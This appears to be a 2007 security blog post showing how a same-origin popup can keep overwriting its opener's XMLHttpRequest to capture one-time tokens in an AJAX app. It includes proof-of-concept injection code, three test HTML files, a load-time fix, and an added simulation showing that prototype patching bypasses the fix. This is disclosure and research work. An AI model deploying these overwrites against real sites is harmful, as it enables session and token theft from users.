Monday, March 26, 2007

One time URLs broken for AJAX apps

After finding the first obvious way to break OneTimeURLPrototype, I want to present another way it can fail.


The prototype itself is not vulnerable, but an AJAX app that uses this prototype to fetch a one-time token is likely to be.


The basis of this is that the XMLHttpRequest constructor is not protected by the prototype: it is an ordinary property of the window object, and any script running in the same origin can replace it.


The key is to open a new window (window-2) from the original window (window-1) and have code in window-2 keep overwriting the XMLHttpRequest object of window-1 periodically. Whenever an XMLHttpRequest is then sent from window-1 (not one sent during window-1's page load, but any sent after the page has finished loading), window-2 sees it, including the URL that carries the one-time token.


Using a separate window-2 lets us do this ACROSS pages: window-1 can navigate to a new document, but window-2 stays open and its opener reference still points at window-1, so the overwrite is reapplied to whatever page window-1 loads next.


So another addition to the POC is to "protect" XMLHttpRequest in window-1 by making a private copy of the constructor while the page is loading, before any other window has had a chance to run code against it, and using that copy for every request.
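The following is an added example, not code from the original post: it models window-1, window-2 and the app's request code as plain JavaScript objects (an assumption, so that it runs under Node without a browser) and walks through three cases: the unprotected app against the constructor overwrite, the "copy it while loading" protection against the same overwrite, and the protection against an attacker who patches the prototype of the native object instead of replacing the constructor. The token URL is constructed sample data.

```javascript
// Added example (not from the original post): models the cross-window
// XMLHttpRequest clobbering in plain JavaScript so it runs under Node.
// "window-1" and "window-2" are plain objects standing in for browser
// windows (assumption); the token URL below is constructed sample data.

// Fresh stand-in for the browser's native XMLHttpRequest per window, so that
// prototype changes made in one scenario cannot leak into the next.
function makeWindow1() {
  class NativeXHR {
    open(method, url, async) { this.method = method; this.url = url; this.async = async; }
    send() { this.sent = true; } // a real browser would put the request on the wire here
  }
  return { XMLHttpRequest: NativeXHR };
}

// Attacker-side (window-2) constructor replacement, as in the post: every
// open() call is captured and nothing is ever sent.
function makeDummy(captured) {
  function Dummy() {}
  Dummy.prototype.open = function (method, url) {
    captured.push({ method, url }); // the one-time token rides along in `url`
  };
  Dummy.prototype.send = function () {};
  return Dummy;
}

// What window-2's setInterval callback does: opener.XMLHttpRequest = dummy
function clobberConstructor(opener, captured) {
  opener.XMLHttpRequest = makeDummy(captured);
}

// Variant attack: leave the constructor alone and patch the prototype of the
// native object, forwarding to the real open() so the request still goes out.
function patchPrototype(opener, captured) {
  const proto = opener.XMLHttpRequest.prototype;
  const realOpen = proto.open;
  proto.open = function (method, url, async) {
    captured.push({ method, url });
    return realOpen.call(this, method, url, async);
  };
}

// Unprotected app code: resolves window.XMLHttpRequest at request time.
function unprotectedApp(win) {
  return function fetchToken(url) {
    const xhr = new win.XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.send();
    return xhr;
  };
}

// "Protected" app code per the post: copy the constructor while the page
// loads, before any other window has had a chance to run against it.
function protectedApp(win) {
  const SavedXHR = win.XMLHttpRequest;
  return function fetchToken(url) {
    const xhr = new SavedXHR();
    xhr.open("GET", url, true);
    xhr.send();
    return xhr;
  };
}

// Runs one scenario (app variant x attack variant). Returns what the attacker
// captured and whether the genuine request was actually issued.
function runScenario(protect, attack) {
  const win1 = makeWindow1();
  const fetchToken = (protect ? protectedApp : unprotectedApp)(win1); // binds at "load"
  const captured = [];
  attack(win1, captured); // window-2's interval fires after window-1 finished loading
  const url = "/token?otp=4f3c9a"; // constructed sample one-time URL
  const xhr = fetchToken(url);
  return { captured, sent: xhr.sent === true && xhr.url === url };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unprotected, clobber:", runScenario(false, clobberConstructor));
  console.log("protected, clobber:  ", runScenario(true, clobberConstructor));
  console.log("protected, proto:    ", runScenario(true, patchPrototype));
}
```

The first case is the post's attack: the app's open() lands on the dummy, the token is captured, and the real request never leaves. Copying the constructor at load time defeats that overwrite, but the third case shows its limit: the saved copy still shares its prototype with the native object, so an attacker who patches `opener.XMLHttpRequest.prototype.open` sees the token anyway, and because the patch forwards to the real open() the request even completes, so the app notices nothing.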



Following is what you paste in the text area of the POC:

<script>
var w = window.open();                    // window-2, same origin as this page
w.document.write(<xmlHttpOverWriteCode>); // a string containing the script block below
</script>


Here is '<xmlHttpOverWriteCode>':
<script>
// Stand-in constructor that gets installed over the opener's XMLHttpRequest.
function dummy() {}
// Every open() now reports the method and URL; the one-time token is in the URL.
// There is no send(), so the app's xhr.send() throws and the request never leaves.
dummy.prototype.open = function (a, b, c) { alert('open called ' + a + b + c); };
// Re-install every 100 ms so the overwrite survives window-1 navigating to a new page.
window.setInterval("trapIt()", 100);
function trapIt() {
  opener.XMLHttpRequest = dummy;
}
</script>
Here is what I used to experiment with this:
Create three HTML files in the same directory, named New1.html, New2.html and New3.html (the names must match the case used in the scripts).
Add the respective code (below) to each of them.
Open New1.html in the browser. All three must be loaded from the same origin, since a popup can only reach its opener's JavaScript objects when the origins match, and pop-up blocking must be off for the page because the window.open() call is not triggered by a user action.

New1.html

<body>
<script>
window.open("New2.html"); // window-2: the trapper; it keeps a reference back to us via opener
location = "New3.html";   // window-1 navigates away; window-2 stays open and opener still points here
</script>
</body>



New2.html

<body>
<script>
// Stand-in constructor with an open() that reveals the method and URL.
function dummy() {}
dummy.prototype.open = function (a, b, c) { alert('open called ' + a + b + c); };
// First fires at 9 s, one second before New3.html's first request.
window.setInterval("xml()", 9000);
function xml() {
  opener.XMLHttpRequest = dummy; // opener is window-1, by now showing New3.html
}
</script>
</body>



New3.html

<body>
<script>
// The "AJAX app": issues a request after page load. By the time this first
// runs (10 s), window-2 has already replaced XMLHttpRequest, so the alert fires.
window.setInterval("xml()", 10000);
function xml() {
  var a = new XMLHttpRequest();
  a.open("HEAD", "/faq/index.html", true);
}
</script>
</body>